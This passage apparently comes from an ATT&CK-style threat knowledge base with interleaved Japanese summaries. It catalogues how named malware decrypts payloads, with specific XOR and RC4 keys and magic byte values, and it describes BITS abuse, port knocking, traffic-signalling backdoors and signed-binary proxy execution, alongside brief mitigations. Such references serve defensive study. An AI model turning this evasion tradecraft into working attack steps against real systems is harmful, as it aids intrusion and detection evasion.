memory. Uroburos can decrypt command parameters sent through C2 and use unpacking code to extract its packed executable. Dyre decrypts resources needed for targeting the victim. gh0st RAT has decrypted and loaded the gh0st RAT DLL into memory, once the initial dropper executable is launched. OnionDuke can use a custom decryption algorithm to decrypt strings. Crimson can decode its encoded PE file prior to execution. ComRAT has used unique per machine passwords to decrypt the orchestrator payload and a hardcoded XOR key to decrypt its communications module. ComRAT has also used a unique password to decrypt the file used for its hidden file system. BBSRAT uses Expand to decompress a CAB file into executable content. Shamoon decrypts ciphertext using an XOR cipher and a base64-encoded string. The Winnti for Windows dropper can decrypt and decompresses a data blob. Pteranodon can decrypt encrypted data strings prior to using them. Cobalt Strike can deobfuscate shellcode using a rolling XOR and decrypt metadata from Beacon sessions. The Cobalt Strike loader component can also decrypt the .bss section of the Beacon binary prior to execution. certutil has been used to decode binaries hidden inside certificate files as Base64 information. Volgmer deobfuscates its strings and APIs once its executed. FinFisher extracts and decrypts stage 3 malware, which is stored in encrypted resources. Starloader decrypts and executes shellcode from a file called Stars.jps. ISMInjector uses the <code>certutil</code> command to decode a payload file. PUNCHBUGGY has used PowerShell to decode base64-encoded assembly. POWERSTATS can deobfuscate the main backdoor code. Smoke Loader deobfuscates its code. ZeroT shellcode decrypts and decompresses its RC4-encrypted payload. Bandook has decoded its PowerShell script. Kwampirs decrypts and extracts a copy of its main DLL payload when executing. Bankshot decodes embedded XOR strings. ROKRAT can decrypt strings using the victim's hostname as the key. Zebrocy decodes its secondary payload and writes it to the victim’s machine. Zebrocy also uses AES and XOR to decrypt strings and payloads. DDKONG decodes an embedded configuration using XOR. VERMIN decrypts code, strings, and commands to use once it's on the victim's machine. RGDoor decodes Base64 strings and decrypts strings using a custom XOR algorithm. InvisiMole can decrypt, unpack and load a DLL from its resources, or from blobs encrypted with Data Protection API, two-key triple DES, and variations of the XOR cipher. One TYPEFRAME variant decrypts an archive using an RC4 key, then decompresses and installs the decrypted malicious DLL module. Another variant decodes the embedded file by XORing it with the value "0x35". OopsIE concatenates then decompresses multiple resources to load an embedded .Net Framework assembly. TrickBot decodes the configuration data and modules. Bisonal has decoded strings in the malware using XOR and RC4. QUADAGENT uses AES and a preshared key to decrypt the custom Base64 routine used to encode strings and scripts. RogueRobin decodes an embedded executable using base64 and decompresses it. Proton uses an encrypted file to store commands and configuration values. MirageFox has a function for decrypting data containing C2 configuration information. More_eggs will decode malware components that are then dropped to the system. Zeus Panda decrypts strings in the code during the execution process. Agent Tesla has the ability to decrypt strings encrypted with the Rijndael symmetric encryption algorithm. Carbon decrypts task and configuration files for execution. Azorult uses an XOR key to decrypt content and uses Base64 to decode the C2 address. AuditCred uses XOR and RC4 to perform decryption on the code functions. Cardinal RAT decodes many of its artifacts and is decrypted (AES-128) after being downloaded. OSX_OCEANLOTUS.D uses a decode routine combining bit shifting and XOR operations with a variable key that depends on the length of the string that was encoded. If the computation for the variable XOR key turns out to be 0, the default XOR key of 0x1B is used. This routine is also referenced as the `rotate` function in reporting. NOKKI uses a unique, custom de-obfuscation technique. Denis will decrypt important strings used for C&C communication. Final1stspy uses Python code to deobfuscate base64-encoded strings. KONNI has used certutil to download and decode base64 encoded strings and has also devoted a custom section to performing all the components of the deobfuscation process. Expand can be used to decompress a local or remote CAB file into an executable. Emotet has used a self-extracting RAR file to deliver modules to victims. Emotet has also extracted embedded executables from files using hard-coded buffer offsets. CoinTicker decodes the initially-downloaded hidden encoded file using OpenSSL. Astaroth uses a fromCharCode() deobfuscation method to avoid explicitly writing execution commands and to hide its code. Remexi decrypts the configuration data using XOR with 25-character keys. Ebury has verified C2 domain ownership by decrypting the TXT record using an embedded RSA public key. Ursnif has used crypto key information stored in the Registry to decrypt Tor clients dropped to disk. YAHOYAH decrypts downloaded files before execution. SQLRat has scripts that are responsible for deobfuscating additional scripts. HiddenWasp uses a cipher to implement a decoding function. LightNeuron has used AES and XOR to decrypt configuration files and commands. HyperBro can unpack and decrypt its payload prior to execution. Exaramel for Linux can decrypt its configuration file. OSX/Shlayer can base64-decode and AES-decrypt downloaded payloads. Versions of OSX/Shlayer pass encrypted and password-protected code to <code>openssl</code> and then write the payload to the <code>/tmp</code> folder. Machete’s downloaded data is decrypted using AES. BabyShark has the ability to decode downloaded files prior to execution. BOOSTWRITE has used a a 32-byte long multi-XOR key to decode data inside its payload. PoetRAT has used LZMA and base64 libraries to decode obfuscated scripts. Winnti for Linux has decoded XOR encoded strings holding its configuration upon execution. Imminent Monitor has decoded malware components that are then dropped to the system. TSCookie has the ability to decrypt, load, and execute a DLL and its resources. Okrum's loader can decrypt the backdoor code, embedded within the loader or within a legitimate PNG file. A custom XOR cipher or RC4 is used for decryption. After checking for the existence of two files, keyword_parm.txt and parm.txt, MESSAGETAP XOR decodes and read the contents of the files. ShimRat has decompressed its core DLL using shellcode once an impersonated antivirus component was running on a system. Lokibot has decoded and decrypted its stages multiple times using hard-coded keys to deliver the final payload, and has decoded its server response hex string using XOR. Rising Sun has decrypted itself using a single-byte XOR scheme. Additionally, Rising Sun can decrypt its configuration data at runtime. Upon execution, Metamorfo has unzipped itself after being downloaded to the system and has performed string decryption. Aria-body has the ability to decrypt the loader configuration and payload DLL. Netwalker's PowerShell script can decode and decrypt multiple layers of obfuscation, leading to the Netwalker DLL being loaded into memory. Ramsay can extract its agent from the body of a malicious document. SDBbot has the ability to decrypt and decompress its payload to enable code execution. WindTail has the ability to decrypt strings using hard-coded AES keys. Skidmap has the ability to download, unpack, and decrypt tar.gz files . ABK has the ability to decrypt AES encrypted payloads. BBK has the ability to decrypt AES encrypted payloads. Avenger has the ability to decrypt files downloaded from C2. BackConfig has used a custom routine to decrypt strings. Valak has the ability to decode and decrypt downloaded files. Goopy has used a polymorphic decryptor to decrypt itself at runtime. Bundlore has used <code>openssl</code> to decrypt AES encrypted payload data. Bundlore has also used base64 and RC4 with a hardcoded key to deobfuscate data. Kessel has decrypted the binary's configuration once the <code>main</code> function was launched. CookieMiner has used Google Chrome's decryption and extraction operations. RDAT can deobfuscate the base64-encoded and AES-encrypted files downloaded from the C2 server. REvil can decode encrypted strings to enable execution of commands and payloads. Hancitor has decoded Base64 encoded URLs to insert a recipient’s name into the filename of the Word document. Hancitor has also extracted executables from ZIP files. PipeMon can decrypt password-protected executables. Drovorub has de-obsfuscated XOR encrypted payloads in WebSocket messages. RegDuke can decrypt strings with a key either stored in the Registry or hardcoded in the code. FatDuke can decrypt AES encrypted C2 communications. LiteDuke has the ability to decrypt and decode multiple layers of obfuscation. WellMess can decode and decrypt data received from C2. WellMail can decompress scripts received from C2. SoreFang can decode and decrypt exfiltrated data sent to C2. Pillowmint has been decompressed by included shellcode prior to being launched. PolyglotDuke can use a custom algorithm to decrypt strings used by the malware. BLINDINGCAN has used AES and XOR to decrypt its DLLs. KGH_SPY can decrypt encrypted strings and write them to a newly created folder. Grandoreiro can decrypt its encrypted internal strings. Lucifer can decrypt its C2 address upon execution. Bazar can decrypt downloaded payloads. Bazar also resolves strings and other artifacts at runtime. Spark has used a custom XOR algorithm to decrypt the payload. SharpStage has decompressed data received from the C2 server. DropBook can unarchive data downloaded from the C2 to obtain the payload and persistence modules. Egregor has been decrypted before execution. TEARDROP was decoded using a custom rolling XOR algorithm to execute a customized Cobalt Strike payload. SUNSPOT decrypts SUNBURST, which was stored in AES128-CBC encrypted blobs. Raindrop decrypted its Cobalt Strike payload using an AES-256 encryption algorithm in CBC mode with a unique key per sample. Dtrack has used a decryption routine that is part of an executable physical patch. BendyBear has decrypted function blocks using a XOR key during runtime to evade detection. Conti has decrypted its payload using a hardcoded AES-256 key. MegaCortex has used a Base64 key to decode its components. Waterbear has the ability to decrypt its RC4 encrypted payload for execution. IronNetInjector has the ability to decrypt embedded .NET and PE payloads. LookBack has a function that decrypts malicious data. AppleJeus has decoded files received from a C2. Kerrdown can decode, decrypt, and decompress multiple layers of shellcode. GoldMax has decoded and decrypted the configuration file when executed. Sibot can decrypt data received from a C2 and save to a file. ShadowPad has decrypted a binary blob to start execution. P.A.S. Webshell can use a decryption mechanism to process a user supplied password and allow execution. Hildegard has decrypted ELF files with AES. Stuxnet decrypts resources that are loaded into memory and executed. Industroyer decrypts code to connect to a remote C2 server. SideTwist can decode and decrypt messages received from C2. Clop has used a simple XOR operation to decrypt strings. WastedLocker's custom cryptor, CryptOne, used an XOR based algorithm to decrypt the payload. PS1 can use an XOR key to decrypt a PowerShell loader and payload binary. CostaBricks has the ability to use bytecode to decrypt embedded payloads. SombRAT can run <code>upload</code> to decrypt and upload files from storage. FIVEHANDS has the ability to decrypt its payload prior to execution. AppleSeed can decode its payload prior to execution. Siloscape has decrypted the password of the C2 server with a simple byte by byte XOR. Siloscape also writes both an archive of Tor and the <code>unzip</code> binary to disk from data embedded within the payload using Visual Studio’s Resource Manager. Ecipekac has the ability to decrypt fileless loader modules. FYAnti has the ability to decrypt an embedded .NET module. RainyDay can decrypt its payload via a XOR key. Chaes has decrypted an AES encrypted binary file to trigger the download of other files. GrimAgent can use a decryption algorithm for strings based on Rotate on Right (RoR) and Rotate on Left (RoL) functionality. EnvyScout can deobfuscate and write malicious ISO files to disk. BoomBox can decrypt AES-encrypted files downloaded from C2. VaporRage can deobfuscate XOR-encoded shellcode prior to execution. NativeZone can decrypt and decode embedded Cobalt Strike beacon stage shellcode. Babuk has the ability to unpack itself into memory using XOR. Avaddon has decrypted encrypted strings. Kobalos decrypts strings right after the initial communication, but before the authentication process. BADFLICK can decode shellcode using a custom rotating XOR cipher. Turian has the ability to use a XOR decryption key to extract C2 server domains and IP addresses. QakBot can deobfuscate and re-assemble code strings for execution. xCaon has decoded strings from the C2 server before executing commands. Clambling can deobfuscate its payload prior to execution. FoggyWeb can be decrypted in memory using a Lightweight Encryption Algorithm (LEA)-128 key and decoded using a XOR key. SysUpdate can deobfuscate packed binaries in memory. ThreatNeedle can decrypt its payload using RC4, AES, or one-byte XORing. Gelsemium can decompress and decrypt DLLs and shellcode. Chrommme can decrypt its encrypted internal code. KOCTOPUS has deobfuscated itself before executing its commands. WarzoneRAT can use XOR 0x45 to decrypt obfuscated code. DarkWatchman has the ability to self-extract as a RAR archive. CharmPower can decrypt downloaded modules prior to execution. Torisma has used XOR and Base64 to decode C2 data. Lizar has decrypted its configuration data, such as the C2 IP address, ports and other network communication. Cyclops Blink can decrypt and parse instructions sent from C2. WhisperGate can deobfuscate downloaded files stored in reverse byte order and decrypt embedded resources using multiple XOR operations. Green Lambert can use multiple custom routines to decrypt strings prior to execution. HermeticWiper can decompress and copy driver files using `LZCopy`. PowerLess can use base64 and AES ECB decryption prior to execution of downloaded modules. ZxxZ has used a XOR key to decrypt strings. DanBot can use a VBA macro to decode its payload prior to installation and execution. MacMa decrypts a downloaded file using AES-128-EBC with a custom delta. Saint Bot can deobfuscate strings and files for execution. Shark can extract and decrypt downloaded .zip files. IceApple can use a Base64-encoded AES key to decrypt tasking. Amadey has decoded antivirus name strings. Mongall has the ability to decrypt its payload prior to execution. Heyoka Backdoor can decrypt its payload prior to execution. Action RAT can use Base64 to decode actor-controlled C2 server communications. Squirrelwaffle has decrypted files and payloads using a XOR-based algorithm. PingPull can decrypt received data from its C2 server by using AES. PyDCrypt has decrypted and dropped the DCSrv payload to disk. Bumblebee can deobfuscate C2 server responses and unpack its code on targeted hosts. The Chinoxy dropping function can initiate decryption of its config file. PowGoop can decrypt PowerShell scripts for execution. Mori can resolve networking APIs from strings that are ADD-encrypted. PcShare has decrypted its strings by applying a XOR operation and a decompression using a custom implemented LZM algorithm. KEYPLUG can decode its configuration file to determine C2 protocols. DEADEYE has the ability to combine multiple sections of a binary which were broken up to evade detection into a single .dll prior to execution. AvosLocker has deobfuscated XOR-encoded strings. metaMain can decrypt and load other modules. Mafalda can decrypt files and data. Brute Ratel C4 has the ability to deobfuscate its payload prior to execution. Woody RAT can deobfuscate Base64-encoded strings and scripts. DarkTortilla can decrypt its payload and associated configuration elements using the Rijndael cipher. QUIETCANARY can use a custom parsing routine to decode the command codes and additional parameters from the C2 before executing them. RotaJakiro uses the AES algorithm, bit shifts in a function called `rotate`, and an XOR cipher to decrypt resources required for persistence, process guarding, and file locking. It also performs this same function on encrypted stack strings and the `head` and `key` sections in the network packet structure used for C2 communications. Sardonic can first decrypt with the RC4 algorithm using a hardcoded decryption key before decompressing. Snip3 can decode its second-stage PowerShell script prior to execution. HUI Loader can decrypt and load files containing malicious payloads. The Ninja loader component can decrypt and decompress the payload. COATHANGER decodes configuration items from a bundled file for command and control activity. SLIGHTPULSE can deobfuscate base64 encoded and RC4 encrypted C2 messages. DarkGate installation includes binary code stored in a file located in a hidden directory, such as <code>shell.txt</code>, that is decrypted then executed. DarkGate uses hexadecimal-encoded shellcode payloads during installation that are called via Windows API <code>CallWindowProc()</code> to decode and then execute. STEADYPULSE can URL decode key/value pairs sent over C2. RAPIDPULSE listens for specific HTTP query parameters in received communications. If specific parameters match, a hard-coded RC4 key is used to decrypt the HTTP query paremter <code>hmacTime</code>. This decrypts to a filename that is then open, read, encrypted with the same RC4 key, base64-encoded, written to standard out, then passed as a response to the HTTP request. WIREFIRE can decode, decrypt, and decompress data received in C2 HTTP `POST` requests. GLASSTOKEN has the ability to decode hexadecimal and Base64 C2 requests. BUSHWALK can Base64 decode and RC4 decrypt malicious payloads sent through a web request’s command parameter. LIGHTWIRE can RC4 decrypt and Base64 decode C2 commands. FRAMESTING can decompress data received within `POST` requests. Mispadu decrypts its encrypted configuration files prior to execution. PITSTOP can deobfuscate base64 encoded and AES encrypted commands. Raspberry Robin contains several layers of obfuscation to hide malicious code from detection and analysis. Apostle compiled code is obfuscated in an unspecified fashion prior to delivery to victims. DEADWOOD XORs some strings within the binary using the value <code>0xD5</code>, and deobfuscates these items at runtime. Gootloader has the ability to decode and decrypt malicious payloads prior to execution. INC Ransomware can run `CryptStringToBinaryA` to decrypt base64 content containing its ransom note. Upon execution Spica can decode an embedded .pdf and write it to the desktop as a decoy document. LunarWeb can decrypt strings related to communication configuration using RC4 with a static key. LunarMail can decrypt strings to retrieve configuration settings. LunarLoader can deobfuscate files containing the next stages in the infection chain. Pikabot decrypts command and control URIs using ADVobfuscator, and decrypts IP addresses and port numbers with a custom algorithm. Other versions of Pikabot decode chunks of stored stage 2 payload content in the initial payload <code>.text</code> section before consolidating them for further execution. Overall LunarMail is associated with multiple encoding and encryption mechanisms to obfuscate the malware's presence and avoid analysis or detection. Nightdoor stores network configuration data in a file XOR encoded with the key value of `0x7A`. Raccoon Stealer uses RC4-encrypted, base64-encoded strings to obfuscate functionality and command and control servers. CHIMNEYSWEEP can use an embedded RC4 key to decrypt Windows API function strings. ROADSWEEP can decrypt embedded scripts prior to execution. Cuckoo Stealer strings are deobfuscated prior to execution. DUSTPAN decodes and decrypts embedded payloads. DUSTTRAP deobfuscates embedded payloads. Latrodectus has the ability to deobfuscate encrypted strings. UPSTYLE encodes its main content prior to loading via Python as base64-encoded blobs. SampleCheck5000 can decode and decrypt command line strings and files received through C2. ODAgent can Base64-decode and XOR decrypt received C2 commands. OilBooster can Base64-decode and XOR-decrypt C2 commands taken from JSON files. PowerExchange can decode and decrypt C2 commands received via email. Exbyte decodes and decrypts data stored in the configuration file with a key provided on the command line during execution. BlackByte Ransomware is distributed as an obfuscated JavaScript launcher file. MagicRAT stores command and control URLs using base64 encoding in the malware's configuration file. StrelaStealer payloads have included strings encrypted via XOR. StrelaStealer JavaScript payloads utilize Base64-encoded payloads that are decoded via certutil to create a malicious DLL file. Line Dancer shellcode payloads are base64 encoded when transmitted to compromised devices. Kapeka utilizes obfuscated JSON structures for various data storage and configuration management items. LockBit 2.0 can decode scripts and strings in loaded modules. StealBit can deobfuscate loaded modules prior to execution. The LockBit 3.0 payload is decrypted at runtime. XLoader uses XOR and RC4 algorithms to decrypt payloads and functions. XLoader can be distributed as a self-extracting RAR archive that launches an AutoIT loader. Sagerunex uses a custom decryption routine to unpack itself during installation. RansomHub can use a provided passphrase to decrypt its configuration file. Lumma Stealer has used Base64-encoded content during execution, decoded via PowerShell. The REPTILE launcher component can decrypt kernel module code from a file and load it into memory. MOPSLED can decrypt obfuscated configuration files. RIFLESPINE can deobfuscate encrypted files prior to execution on targeted hosts. THINCRUST can deobfuscate RSA encrypted C2 commands received through the DEVICEID cookie. CASTLETAP can filter and deobfuscate an XOR encrypted activation string in the payload of an ICMP echo request. BOOKWORM has decoded its Base64 encoded payload prior to execution. BOOKWORM has also encrypted files with RC4 and has decrypted its payload prior to execution. StarProxy has decrypted network packets using a custom algorithm. PUBLOAD has decoded its payload prior to execution. SplatDropper has decoded XOR encrypted payload. CorKLOG has decoded XOR encrypted strings. CLAIMLOADER has decoded its payload prior to execution. TONESHELL has decoded its payload prior to execution. RedLine Stealer has decoded its payload prior to execution. Medusa Ransomware has decoded XOR encrypted strings prior to execution in memory. InvisibleFerret has decoded XOR-encrypted and Base-64-encoded payloads prior to execution. Embargo has utilized MDeployer to decrypt two payloads that contain MS4Killer toolkit b.cache and the Embargo ransomware executable a.cache with a hardcoded RC4 key `wlQYLoPCil3niI7x8CvR9EtNtL/aeaHrZ23LP3fAsJogVTIzdnZ5Pi09ZVeHFkiB`. XORIndex Loader can decode its payload prior to execution. HexEval Loader has decoded its payload prior to execution. SystemBC has the ability to decrypt RC4 encrypted packets and to decode obfuscated data before C2 communication. Additionally, SystemBC has decrypted its config file that was encoded with XOR and a hardcoded 40-byte key. HTTPTroy has decoded strings encoded with Base64 and XOR prior to execution. GlassWorm has decoded its Base64 instructions. GlassWorm has also decrypted its AES protected payloads. BRUSHFIRE has decrypted XOR strings prior to execution. PHASEJAM has the ability to decode Base64 commands and data. BRICKSTORM has decoded its encrypted C2 traffic prior to execution. BRICKSTORM also has the ability to decode its obfuscated payload before execution. Caminho can deobfuscate downloaded files prior to execution. HeartCrypt can decrypt payloads prior to execution. PureCrypter can decrypt downloaded resources and parse internal files to determine its settings. DOWNIISSA can decode strings prior to execution. HiddenFace has the ability to decrypt its payload prior to execution. SPAWNCHIMERA has decoded a XOR encoded private key. NOOPLDR can decrypt its payload prior to execution. ROAMINGHOUSE can decode and drop a malicious ZIP file prior to execution. ANELLDR can decrypt encrypted payload data using AES-256-CBC and subsequently execute the payload in memory. PHPsert has the ability to decode and decrypt obfuscated strings prior to execution. IronWind can deobfuscate the next stage payload using Base64 and XOR operations with the key "53". The AshTag stager compoment can decode and decrypt Base64 and XOR-encrypted payloads. MuddyViper has decrypted the embedded HackBrowserData tool prior to execution. Fooder has decrypted payloads using the WinCrypt API and the AES key. Tsundere Botnet’s loader has decrypted obfuscated JavaScript files using the AES-256 CBC algorithm, a build-specific key, and initialization vector. LAMEHUG can decode and drop a decoy file attached to spearphishing emails. LP-Notes has decrypted strings with lengths ranging from 15 to 19 characters using the same decryption key for each string. RustyWater has used the WriteHexToFile function to transform an embedded hex string to the payload CertificationKit.ini. 敵対者は、Windowsのバックグラウンドインテリジェント転送サービス(BITS)を悪用してダウンロードや実行・永続化を行うことがある。 Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM). BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. アカウントの作成・権限・ライフサイクルを適切に管理する。 OSを安全に構成し、攻撃対象領域を縮小する。 ネットワークトラフィックをフィルタリングし、悪意ある通信を遮断する。 BITSジョブに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Patchwork has used BITS jobs to download malicious payloads. Leviathan has used BITSAdmin to download additional tools. APT39 has used the BITS protocol to exfiltrate stolen data from a compromised host. APT41 used BITSAdmin to download and install payloads. Wizard Spider has used batch scripts that utilizes WMIC to execute a BITSAdmin transfer of a ransomware payload to each compromised machine. Cobalt Strike can download a hosted "beacon" payload using BITSAdmin. BITSAdmin can be used to create BITS Jobs to launch a malicious process. A JPIN variant downloads the backdoor payload via the BITS service. UBoatRAT takes advantage of the /SetNotifyCmdLine option in BITSAdmin to ensure it stays running on a system to maintain persistence. Bazar has been downloaded via Windows BITS functionality. Egregor has used BITSadmin to download and execute malicious DLLs. MarkiRAT can use BITS Utility to connect with the C2 server. ProLock can use BITS jobs to download its malicious payload. 敵対者は、間接的な手段でコマンドを実行して検知を回避することがある。 Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking cmd. For example, Forfiles, the Program Compatibility Assistant (`pcalua.exe`), components of the Windows Subsystem for Linux (WSL), `Scriptrunner.exe`, as well as other utilities may invoke the execution of programs and commands from a Command and Scripting Interpreter, Run window, or via scripts. Adversaries may also abuse the `ssh.exe` binary to execute malicious commands via the `ProxyCommand` and `LocalCommand` options, which can be invoked via the `-o` flag or by modifying the SSH config file. 間接的コマンド実行に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Lazarus Group persistence mechanisms have used <code>forfiles.exe</code> to execute .htm files. RedCurl has used pcalua.exe to obfuscate binary execution and remote connections. Forfiles can be used to subvert controls and possibly conceal command execution by not directly invoking cmd. Revenge RAT uses the Forfiles utility to execute commands on the system. 敵対者は、特定のパケット列を合図にバックドアを起動して検知を回避することがある。 Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. Port Knocking), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. 敵対者は、特定ポートへの接続列（ポートノッキング）を合図にバックドアを起動することがある。Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software. 敵対者は、ソケットフィルタを用いて特定パケットを合図に動作することがある。Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell. ネットワークトラフィックをフィルタリングし、悪意ある通信を遮断する。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 トラフィックシグナリングに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Cutting Edge, threat actors sent a magic 48-byte sequence to enable the PITSOCK backdoor to communicate via the `/tmp/clientsDownload.sock` socket. During RedPenguin, UNC3886 leveraged malware capable of inpecting packets for a magic-string to activate backdoor functionalities. Kimsuky has used TRANSLATEXT to redirect clients to legitimate Gmail, Naver or Kakao pages if the clients connect with no parameters. Mustang Panda has utilized a magic value in C2 communications and only executes in memory when response packets match specific values of “17 03 03” or “46 77 4d”. UNC3886 has used the TABLEFLIP traffic redirection utility to listen for specialized command packets on compromised FortiManager devices. Uroburos can intercept the first client to server packet in the 3-way TCP handshake to determine if the packet contains the correct unique value for a specific Uroburos implant. If the value does not match, the packet and the rest of the TCP session are passed to the legitimate listening application. Chaos provides a reverse shell is triggered upon receipt of a packet with a special string, sent to any port. Umbreon provides additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet. Winnti for Linux has used a passive listener, capable of identifying a specific magic value before executing tasking, as a secondary command and control (C2) mechanism. Ryuk has used Wake-on-Lan to power on turned off systems for lateral movement. SYNful Knock can be sent instructions via special packets to change its functionality. Code for new functionality can be included in these messages. Penquin will connect to C2 only after sniffing a "magic packet" value in TCP or UDP packets matching specific conditions. Kobalos is triggered by an incoming TCP connection to a legitimate service from a specific source port. Pandora can identify if incoming HTTP traffic contains a token and if so it will intercept the traffic and process the received command. ZIPLINE can identify a specific string in intercepted network traffic, `SSH-2.0-OpenSSH_0.3xx.`, to trigger its command functionality. BUSHWALK can modify the `DSUserAgentCap.pm` Perl module on Ivanti Connect Secure VPNs and either activate or deactivate depending on the value of the user agent in incoming HTTP requests. TRANSLATEXT has redirected clients to legitimate Gmail, Naver or Kakao pages if the clients connect with no parameters. J-magic can monitor TCP traffic for packets containing one of five different predefined parameters and will spawn a reverse shell if one of the parameters and the proper response string to a subsequent challenge is received. The REPTILE reverse shell component can listen for a specialized packet in TCP, UDP, or ICMP for activation. PUBLOAD has utilized a magic value in C2 communications and only executes in memory when response packets match specific values of 17 03 03. PUBLOAD has also used magic bytes consisting of 46 77 4d. TONESHELL has utilized a magic value in C2 communications and only executes in memory when response packets match specific values. BRUSHFIRE has monitored inbound VPN traffic to compromised appliances until specific inbound packets contain a specific magic string/pattern instead of external beaconing. 敵対者は、脆弱性を悪用してセキュリティ機能を回避することがある。 Adversaries may exploit vulnerabilities to evade detection by hiding activity, suppressing logging, or operating within trusted or unmonitored components. 脅威インテリジェンスを活用し、対象となる脅威アクターのTTPを把握する。 アプリを分離・サンドボックス化し、影響範囲を限定する。 エクスプロイト保護機能で脆弱性悪用を防ぐ。 ソフトウェアを最新に保ち、既知の脆弱性を修正する。 ステルスのための脆弱性悪用に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 APT28 has used CVE-2015-4902 to bypass security features. Velvet Ant exploited CVE-2024-20399 in Cisco Switches to which the threat actor was already able to authenticate in order to escape the NX-OS command line interface and gain access to the underlying operating system for arbitrary command execution. 敵対者は、署名済みシステムスクリプトを悪用して悪意あるコードをプロキシ実行することがある。 Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems. 敵対者は、PubPrn.vbsを悪用して署名済みスクリプト経由でコードを実行することがある。Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the Windows Command Shell via <code>Cscript.exe</code>. For example, the following code publishes a printer within the specified domain: <code>cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com</code>. 敵対者は、SyncAppvPublishingServerを悪用してコードを実行することがある。Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution of malicious PowerShell commands. SyncAppvPublishingServer.vbs is a Visual Basic script associated with how Windows virtualizes applications (Microsoft Application Virtualization, or App-V). For example, Windows may render Win32 applications to users as virtual applications, allowing users to launch and interact with them as if they were installed locally. The SyncAppvPublishingServer.vbs script is legitimate, may be signed by Microsoft, and is commonly executed from `\System32` through the command line via `wscript.exe`. 許可されていないコードの実行を防止する。 システムスクリプトによるプロキシ実行に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 敵対者は、署名済みシステムバイナリを悪用して悪意あるコードをプロキシ実行することがある。 Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system. Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands. 敵対者は、コンパイル済みHTMLファイル(CHM)を悪用してコードを実行することがある。Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. CHM content is displayed using underlying components of the Internet Explorer browser loaded by the HTML Help executable program (hh.exe). 敵対者は、コントロールパネル項目を悪用してコードを実行することがある。Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings. 敵対者は、CMSTPを悪用して署名済みプロセス経由でコードを実行することがある。Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections. 敵対者は、InstallUtilを悪用してコードを実行することがある。Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe</code>. 敵対者は、Mshtaを悪用してHTAやスクリプトを実行することがある。Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code 敵対者は、Msiexecを悪用してコードを実行することがある。Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi). The Msiexec.exe binary may also be digitally signed by Microsoft. 敵対者は、Odbcconfを悪用してコードを実行することがある。Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a 